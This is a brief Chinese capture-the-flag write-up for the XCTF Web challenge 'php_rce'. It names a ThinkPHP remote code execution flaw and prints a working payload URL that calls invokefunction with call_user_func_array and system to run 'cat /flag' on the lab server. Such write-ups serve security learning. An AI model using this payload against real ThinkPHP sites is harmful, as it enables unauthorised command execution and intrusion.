题目:
XCTF Web 高手区004: php_rce
WP:
看到题目就知道是thinkphp的远程执行漏洞
这里大家可以看一下这位大佬是末初呀~的博客,他对thinkphp的相关知识讲的很棒

我们直接上payload:

http://111.198.29.45:45747/index.php? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

得到flag
XCTF Web 高手区004: php_rce

相关文章:

  • 2022-12-23
  • 2021-04-22
  • 2021-09-21
  • 2021-08-16
  • 2021-12-09
  • 2021-08-24
  • 2021-07-10
猜你喜欢
  • 2021-12-17
  • 2021-05-07
  • 2021-06-10
  • 2021-08-30
  • 2021-05-09
  • 2021-08-08
  • 2021-07-24
相关资源
相似解决方案